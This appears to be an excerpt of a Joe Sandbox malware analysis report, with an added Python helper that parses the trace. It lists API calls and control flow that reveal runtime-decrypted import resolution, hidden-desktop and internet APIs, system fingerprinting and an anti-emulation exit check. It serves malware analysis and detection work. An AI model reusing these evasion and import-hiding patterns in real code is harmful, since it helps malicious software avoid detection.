                        • GetProcAddress.KERNEL32(73B40000,0157B9A0), ref: 00466C4E
                        • GetProcAddress.KERNEL32(73B40000,0158CF08), ref: 00466C66
                        • GetProcAddress.KERNEL32(73B40000,0158D0E8), ref: 00466C7E
                        • GetProcAddress.KERNEL32(73B40000,01575B70), ref: 00466C97
                        • GetProcAddress.KERNEL32(73B40000,01575E50), ref: 00466CAF
                        • GetProcAddress.KERNEL32(73B40000,0158D088), ref: 00466CC7
                        • GetProcAddress.KERNEL32(752C0000,01575C70), ref: 00466CE3
                        • GetProcAddress.KERNEL32(752C0000,01575BF0), ref: 00466CFB
                        • GetProcAddress.KERNEL32(752C0000,0158D130), ref: 00466D14
                        • GetProcAddress.KERNEL32(752C0000,0158D148), ref: 00466D2C
                        • GetProcAddress.KERNEL32(752C0000,01575AB0), ref: 00466D44
                        • GetProcAddress.KERNEL32(74EC0000,0157B9C8), ref: 00466D64
                        • GetProcAddress.KERNEL32(74EC0000,0157B9F0), ref: 00466D7C
                        • GetProcAddress.KERNEL32(74EC0000,0158D0B8), ref: 00466D95
                        • GetProcAddress.KERNEL32(74EC0000,01575B30), ref: 00466DAD
                        • GetProcAddress.KERNEL32(74EC0000,01575CB0), ref: 00466DC5
                        • GetProcAddress.KERNEL32(74EC0000,0157B928), ref: 00466DDE
                        • GetProcAddress.KERNEL32(75BD0000,0158D160), ref: 00466DFE
                        • GetProcAddress.KERNEL32(75BD0000,01575BD0), ref: 00466E16
                        • GetProcAddress.KERNEL32(75BD0000,01588F28), ref: 00466E2F
                        • GetProcAddress.KERNEL32(75BD0000,0158D0D0), ref: 00466E47
                        • GetProcAddress.KERNEL32(75BD0000,0158D1A8), ref: 00466E5F
                        • GetProcAddress.KERNEL32(75BD0000,01575B90), ref: 00466E78
                        • GetProcAddress.KERNEL32(75BD0000,01575AF0), ref: 00466E90
                        • GetProcAddress.KERNEL32(75BD0000,0158CF20), ref: 00466EA8
                        • GetProcAddress.KERNEL32(75BD0000,0158CF80), ref: 00466EC1
                        • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00466ED7
                        • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00466EEE
                        • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00466F05
                        • GetProcAddress.KERNEL32(75A70000,01575CD0), ref: 00466F21
                        • GetProcAddress.KERNEL32(75A70000,0158CF38), ref: 00466F39
                        • GetProcAddress.KERNEL32(75A70000,0158CF50), ref: 00466F52
                        • GetProcAddress.KERNEL32(75A70000,0158CFE0), ref: 00466F6A
                        • GetProcAddress.KERNEL32(75A70000,0158CF68), ref: 00466F82
                        • GetProcAddress.KERNEL32(75450000,01575C50), ref: 00466F9E
                        • GetProcAddress.KERNEL32(75450000,01575BB0), ref: 00466FB6
                        • GetProcAddress.KERNEL32(75DA0000,01575C90), ref: 00466FD2
                        • GetProcAddress.KERNEL32(75DA0000,0158CF98), ref: 00466FEA
                        • GetProcAddress.KERNEL32(6F070000,01575E10), ref: 0046700A
                        • GetProcAddress.KERNEL32(6F070000,01575CF0), ref: 00467022
                        • GetProcAddress.KERNEL32(6F070000,01575D10), ref: 0046703B
                        • GetProcAddress.KERNEL32(6F070000,0158CFB0), ref: 00467053
                        • GetProcAddress.KERNEL32(6F070000,01575D30), ref: 0046706B
                        • GetProcAddress.KERNEL32(6F070000,01575B10), ref: 00467084
                        • GetProcAddress.KERNEL32(6F070000,01575D90), ref: 0046709C
                        • GetProcAddress.KERNEL32(6F070000,01575D50), ref: 004670B4
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004670CB
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004670E2
                        • GetProcAddress.KERNEL32(75AF0000,0158D280), ref: 004670FE
                        • GetProcAddress.KERNEL32(75AF0000,01589048), ref: 00467116
                        • GetProcAddress.KERNEL32(75AF0000,0158D238), ref: 0046712F
                        • GetProcAddress.KERNEL32(75AF0000,0158D3B8), ref: 00467147
                        • GetProcAddress.KERNEL32(75D90000,01575DB0), ref: 00467163
                        • GetProcAddress.KERNEL32(6CE70000,0158D3E8), ref: 0046717F
                        • GetProcAddress.KERNEL32(6CE70000,01575D70), ref: 00467197
                        • GetProcAddress.KERNEL32(6CE70000,0158D400), ref: 004671B0
                        • GetProcAddress.KERNEL32(6CE70000,0158D208), ref: 004671C8
                        Strings
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                        • API String ID: 2238633743-3468015613
                        • Opcode ID: 418c34d4253a7e077381f16ccdfca25018462367ef674168d321f27c65c5cd5a
                        • Instruction ID: 595af629bd48e1c01ede9fc3309a11b66fd6405488dae7d93c35e64f4aba822b
                        • Opcode Fuzzy Hash: 418c34d4253a7e077381f16ccdfca25018462367ef674168d321f27c65c5cd5a
                        • Instruction Fuzzy Hash: 2B621DB56A02009FD75CDF64EC8CA2A37FBF789755310A91DE95D83264EA34A880DB70
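The API list above is the raw evidence behind the "Extensive use of GetProcAddress" signature in the report overview: 107 GetProcAddress calls across 13 module handles, only five of them with a name the sandbox could show in plaintext (CreateDesktopA, OpenDesktopA, CloseDesktop, InternetSetOptionA, HttpQueryInfoA). The remaining name arguments are pointers in the 0x0157xxxx/0x0158xxxx range, outside the image region covered by the memory dumps, so those strings were built or decrypted at run time. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses records in the format shown above, groups GetProcAddress calls by module handle, separates plaintext names from runtime pointers, notes which handles were used before any LoadLibraryA call, and names a DLL only where a plaintext export pins it down (CreateDesktopA, OpenDesktopA and CloseDesktop are user32.dll exports; InternetSetOptionA and HttpQueryInfoA are wininet.dll exports). The embedded trace is a subset copied from the list above, and the image upper bound is an assumption, as the comments say.

```python
import re
from collections import defaultdict

# Constructed input: sandbox trace records copied from the "APIs" list of the
# import-resolution routine at 0x4666e0 above (a representative subset; paste
# the full list to reproduce the per-module totals in its control-flow graph).
API_TRACE = """\
GetProcAddress.KERNEL32(74DD0000,015757D0), ref: 004666F5
GetProcAddress.KERNEL32(74DD0000,015758D0), ref: 0046670D
GetProcAddress.KERNEL32(74DD0000,01589628), ref: 00466726
LoadLibraryA.KERNEL32(0158D1C0,0046051F), ref: 00466B05
LoadLibraryA.KERNEL32(0158D010), ref: 00466B16
GetProcAddress.KERNEL32(75290000,01575C30), ref: 00466B9C
GetProcAddress.KERNEL32(75BD0000,0158CF80), ref: 00466EC1
GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00466ED7
GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00466EEE
GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00466F05
GetProcAddress.KERNEL32(6F070000,01575E10), ref: 0046700A
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004670CB
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004670E2
"""

# Region covered by the image dumps under "Memory Dump Source" (0x440000 up to
# the last listed region at 0xAD4000). The upper bound is an assumption; it only
# has to separate image addresses from the 0x0157xxxx/0x0158xxxx heap pointers.
IMAGE_LO, IMAGE_HI = 0x00440000, 0x00AD5000

# Which DLL exports each plaintext name (Windows facts). Handles that never
# receive a plaintext name are left unidentified rather than guessed.
KNOWN_EXPORTS = {
    "CreateDesktopA": "user32.dll",
    "OpenDesktopA": "user32.dll",
    "CloseDesktop": "user32.dll",
    "InternetSetOptionA": "wininet.dll",
    "HttpQueryInfoA": "wininet.dll",
}

RECORD_RE = re.compile(r"^(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]{8})$")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_trace(text):
    """Return [(api, [args...], call_site)] for each well-formed record, in trace order."""
    calls = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            api, _exporting_dll, args, ref = m.groups()
            calls.append((api, [a.strip() for a in args.split(",")], int(ref, 16)))
    return calls


def classify_name_arg(arg):
    """'plaintext' for an export name; for an address, 'image' if it lies inside the
    mapped image (a static string), else 'runtime' (built or decrypted at run time)."""
    if not HEX32_RE.match(arg):
        return "plaintext"
    return "image" if IMAGE_LO <= int(arg, 16) < IMAGE_HI else "runtime"


def summarize_imports(text):
    """Group GetProcAddress calls by module handle and count LoadLibraryA calls."""
    modules = defaultdict(lambda: {"count": 0, "plaintext": [], "runtime": 0, "image": 0, "dll": None})
    loadlibrary = 0
    for api, args, _ref in parse_trace(text):
        if api == "LoadLibraryA":
            loadlibrary += 1
        elif api == "GetProcAddress" and len(args) >= 2:
            handle, name = args[0], args[1]
            entry = modules[handle]
            entry["count"] += 1
            kind = classify_name_arg(name)
            if kind == "plaintext":
                entry["plaintext"].append(name)
                entry["dll"] = entry["dll"] or KNOWN_EXPORTS.get(name)
            else:
                entry[kind] += 1
    return {"loadlibrary_calls": loadlibrary, "modules": dict(modules)}


def preloaded_handles(text):
    """Handles passed to GetProcAddress before the first LoadLibraryA: those modules
    were already in the process (static imports or the loader), not loaded here."""
    seen = set()
    for api, args, _ref in parse_trace(text):
        if api == "LoadLibraryA":
            break
        if api == "GetProcAddress" and args:
            seen.add(args[0])
    return seen


def hidden_import_ratio(summary):
    """Fraction of resolved names that were not visible as plaintext; a high value is
    what the report's 'Extensive use of GetProcAddress' signature keys on."""
    total = sum(m["count"] for m in summary["modules"].values())
    plain = sum(len(m["plaintext"]) for m in summary["modules"].values())
    return 0.0 if total == 0 else (total - plain) / total


if __name__ == "__main__":
    s = summarize_imports(API_TRACE)
    print(f"LoadLibraryA calls: {s['loadlibrary_calls']}, preloaded: {sorted(preloaded_handles(API_TRACE))}")
    for handle, m in s["modules"].items():
        print(f"{handle}: {m['count']} GetProcAddress, {m['runtime']} runtime-built names, "
              f"plaintext={m['plaintext']}, dll={m['dll'] or 'unknown'}")
    print(f"hidden import ratio: {hidden_import_ratio(s):.2f}")
```

Run over the complete list above, the same code reports 107 GetProcAddress calls over 13 handles against only 8 LoadLibraryA calls, so at least five of those modules were already mapped when the routine ran (handle 74DD0000 is used before any LoadLibraryA), and a hidden-import ratio of 102/107. The identification of user32.dll and wininet.dll rests only on the plaintext names; every other handle stays unknown until the runtime strings are recovered from the dumps.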
                        APIs
                        • lstrlen.KERNEL32(0046CFEC), ref: 0045F1D5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F1F1
                        • lstrlen.KERNEL32(0046CFEC), ref: 0045F1FC
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F215
                        • lstrlen.KERNEL32(0046CFEC), ref: 0045F220
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F239
                        • lstrcpy.KERNEL32(00000000,00474FA0), ref: 0045F25E
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F28C
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F2C0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045F2F0
                        • lstrlen.KERNEL32(015759D0), ref: 0045F315
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: e88d409734c94f5768148f97ccd10e885e223ea07bb46170d06d2ad30c75d1fb
                        • Instruction ID: 6181bbc9e594108f1faab5f43710751a8b1df205eac8f8a4f7d70a57a1851318
                        • Opcode Fuzzy Hash: e88d409734c94f5768148f97ccd10e885e223ea07bb46170d06d2ad30c75d1fb
                        • Instruction Fuzzy Hash: F4A27D70A012029FDB24DF65C948A5BB7F5AF44305F58807AEC09DB362EB39DC4ACB56
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460013
                        • lstrlen.KERNEL32(0046CFEC), ref: 004600BD
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004600E1
                        • lstrlen.KERNEL32(0046CFEC), ref: 004600EC
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460110
                        • lstrlen.KERNEL32(0046CFEC), ref: 0046011B
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0046013F
                        • lstrlen.KERNEL32(0046CFEC), ref: 0046015A
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460189
                        • lstrlen.KERNEL32(0046CFEC), ref: 00460194
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004601C3
                        • lstrlen.KERNEL32(0046CFEC), ref: 004601CE
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460206
                        • lstrlen.KERNEL32(0046CFEC), ref: 00460250
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00460288
                        • lstrcpy.KERNEL32(00000000,?), ref: 0046059B
                        • lstrlen.KERNEL32(015757B0), ref: 004605AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004605D7
                        • lstrcat.KERNEL32(00000000,?), ref: 004605E3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046060E
                        • lstrlen.KERNEL32(0158E448), ref: 00460625
                        • lstrcpy.KERNEL32(00000000,?), ref: 0046064C
                        • lstrcat.KERNEL32(00000000,?), ref: 00460658
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00460681
                        • lstrlen.KERNEL32(01575770), ref: 00460698
                        • lstrcpy.KERNEL32(00000000,?), ref: 004606C9
                        • lstrcat.KERNEL32(00000000,?), ref: 004606D5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00460706
                        • lstrcpy.KERNEL32(00000000,015890D8), ref: 0046074B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0046077F
                        • lstrcpy.KERNEL32(00000000,0158E298), ref: 004607E7
                        • lstrcpy.KERNEL32(00000000,01589128), ref: 00460858
                        • lstrcpy.KERNEL32(00000000,fplugins), ref: 004608CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00460928
                        • lstrcpy.KERNEL32(00000000,015892A8), ref: 004609F8
                          • Part of subcall function 004424E0: lstrcpy.KERNEL32(00000000,?), ref: 00442528
                          • Part of subcall function 004424E0: lstrcpy.KERNEL32(00000000,?), ref: 0044254E
                          • Part of subcall function 004424E0: lstrcpy.KERNEL32(00000000,?), ref: 00442577
                        • lstrcpy.KERNEL32(00000000,01589118), ref: 00460ACE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00460B81
                        • lstrcpy.KERNEL32(00000000,01589118), ref: 00460D58
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID: fplugins
                        • API String ID: 2500673778-38756186
                        • Opcode ID: 0e5a7ffb4928dd12a9013ad152b6f7e15c95d8d165e39d14ab6cd481551ad4eb
                        • Instruction ID: b28a94908d527e71986c4535a070a82c29ee84499460ad599af871c2096c2d53
                        • Opcode Fuzzy Hash: 0e5a7ffb4928dd12a9013ad152b6f7e15c95d8d165e39d14ab6cd481551ad4eb
                        • Instruction Fuzzy Hash: 1CE26C70A053418FD734DF29C588B5BBBE1BF88304F58856EE48D8B362EB399845CB56
                        APIs
                        • lstrlen.KERNEL32(015759D0), ref: 0045F315
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F3A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F3C7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F47B
                        • lstrcpy.KERNEL32(00000000,015759D0), ref: 0045F4BB
                        • lstrcpy.KERNEL32(00000000,01589078), ref: 0045F4EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F59E
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0045F61C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F64C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F69A
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0045F718
                        • lstrlen.KERNEL32(01588F88), ref: 0045F746
                        • lstrcpy.KERNEL32(00000000,01588F88), ref: 0045F771
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045F793
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045F7E4
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0045FA32
                        • lstrlen.KERNEL32(01588F08), ref: 0045FA60
                        • lstrcpy.KERNEL32(00000000,01588F08), ref: 0045FA8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045FAAD
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045FAFE
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: 8e03530eddabf97dd6b7a34e47238cd4c6110d85e67f3d5d2f7cde6e092fd552
                        • Instruction ID: d9a07f9239292c9196a4f4ced4bdf5c6a33b49d1c609fec727db484dd42fcc0d
                        • Opcode Fuzzy Hash: 8e03530eddabf97dd6b7a34e47238cd4c6110d85e67f3d5d2f7cde6e092fd552
                        • Instruction Fuzzy Hash: CBF14E70A01201CFDB24CF65C948A5AB7E6BF44316B5881BFDC099B362D739DC8ACB56

                        Control-flow Graph
                        control_flow_graph 2721 458ca0-458cc4 StrCmpCA 2722 458cc6-458cc7 ExitProcess 2721->2722 2723 458ccd-458ce6 2721->2723 2725 458ee2-458eef call 442a20 2723->2725 2726 458cec-458cf1 2723->2726 2728 458cf6-458cf9 2726->2728 2729 458ec3-458edc 2728->2729 2730 458cff 2728->2730 2729->2725 2764 458cf3 2729->2764 2732 458d84-458d92 StrCmpCA 2730->2732 2733 458da4-458db8 StrCmpCA 2730->2733 2734 458d06-458d15 lstrlen 2730->2734 2735 458e6f-458e7d StrCmpCA 2730->2735 2736 458e88-458e9a lstrlen 2730->2736 2737 458e56-458e64 StrCmpCA 2730->2737 2738 458d30-458d3f lstrlen 2730->2738 2739 458dbd-458dcb StrCmpCA 2730->2739 2740 458ddd-458deb StrCmpCA 2730->2740 2741 458dfd-458e0b StrCmpCA 2730->2741 2742 458e1d-458e2b StrCmpCA 2730->2742 2743 458e3d-458e4b StrCmpCA 2730->2743 2744 458d5a-458d69 lstrlen 2730->2744 2732->2729 2748 458d98-458d9f 2732->2748 2733->2729 2753 458d17-458d1c call 442a20 2734->2753 2754 458d1f-458d2b call 442930 2734->2754 2735->2729 2757 458e7f-458e86 2735->2757 2758 458ea4-458eb0 call 442930 2736->2758 2759 458e9c-458ea1 call 442a20 2736->2759 2737->2729 2756 458e66-458e6d 2737->2756 2760 458d41-458d46 call 442a20 2738->2760 2761 458d49-458d55 call 442930 2738->2761 2739->2729 2749 458dd1-458dd8 2739->2749 2740->2729 2750 458df1-458df8 2740->2750 2741->2729 2751 458e11-458e18 2741->2751 2742->2729 2752 458e31-458e38 2742->2752 2743->2729 2755 458e4d-458e54 2743->2755 2745 458d73-458d7f call 442930 2744->2745 2746 458d6b-458d70 call 442a20 2744->2746 2779 458eb3-458eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2754 2754->2779 2755->2729 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2764->2728 2779->2729 2780 458eb7-458eb9 2779->2780 2780->2729 2781 458ebb-458ebd lstrcpy 2780->2781 2781->2729
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 8014927a6c6ba502f4ea5545ede5a3ffee3fc64f7a6e0f142f53b5039dcae8ad
                        • Instruction ID: a33bdaec3f09d2ca671d791a28bad6173b7017541789d7c9ee1ad30631160318
                        • Opcode Fuzzy Hash: 8014927a6c6ba502f4ea5545ede5a3ffee3fc64f7a6e0f142f53b5039dcae8ad
                        • Instruction Fuzzy Hash: 1F51C070A00701AFC7219F75DD85A6B77F4BB54706B10581FE846E2612DFBCD84A8B2A

                        Control-flow Graph
                        control_flow_graph 2782 462740-462783 GetWindowsDirectoryA 2783 462785 2782->2783 2784 46278c-4627ea GetVolumeInformationA 2782->2784 2783->2784 2785 4627ec-4627f2 2784->2785 2786 4627f4-462807 2785->2786 2787 462809-462820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 462826-462844 wsprintfA 2787->2788 2789 462822-462824 2787->2789 2790 46285b-462872 call 4671e0 2788->2790 2789->2790
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0046277B
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004593B6,00000000,00000000,00000000,00000000), ref: 004627AC
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0046280F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462816
                        • wsprintfA.USER32 ref: 0046283B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                        • String ID: :\$C
                        • API String ID: 2572753744-3309953409
                        • Opcode ID: 8404a5740e2298230f9c2c7ee6063131fe6411e321f1ceda32cd24eb594425fe
                        • Instruction ID: 20785adc5a2f69094b701d8e498aeb33a12ce077e91be999441242708abd9ee4
                        • Opcode Fuzzy Hash: 8404a5740e2298230f9c2c7ee6063131fe6411e321f1ceda32cd24eb594425fe
                        • Instruction Fuzzy Hash: C73170B1944209AFCB04DFA88E859EFBFB9EB58710F10016AE505F7250E6748A408BA6

                        Control-flow Graph
                        control_flow_graph 2793 444bc0-444bce 2794 444bd0-444bd5 2793->2794 2794->2794 2795 444bd7-444c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 442a20 2794->2795
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00444BF7
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00444C01
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00444C0B
                        • lstrlen.KERNEL32(?,00000000,?), ref: 00444C1F
                        • InternetCrackUrlA.WININET(?,00000000), ref: 00444C27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: a2a54c2d028e4ca6c7b982fe778e15cc4a09c59ac36e2c3a2c57a3d2955e7a67
                        • Instruction ID: a84a14867fa37cb5d323014f1c43727e566a930b3bd5f70ce2d6138cd65eac62
                        • Opcode Fuzzy Hash: a2a54c2d028e4ca6c7b982fe778e15cc4a09c59ac36e2c3a2c57a3d2955e7a67
                        • Instruction Fuzzy Hash: 5B012171D00218AFDB14DFA9EC45B9EBBB8EB44364F004126F914E7390DB7459058FD5

                        Control-flow Graph
                        control_flow_graph 2798 441030-441055 GetCurrentProcess VirtualAllocExNuma 2799 441057-441058 ExitProcess 2798->2799 2800 44105e-44107b VirtualAlloc 2798->2800 2801 441082-441088 2800->2801 2802 44107d-441080 2800->2802 2803 4410b1-4410b6 2801->2803 2804 44108a-4410ab VirtualFree 2801->2804 2802->2801 2804->2803
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00441046
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 0044104D
                        • ExitProcess.KERNEL32 ref: 00441058
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0044106C
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004410AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
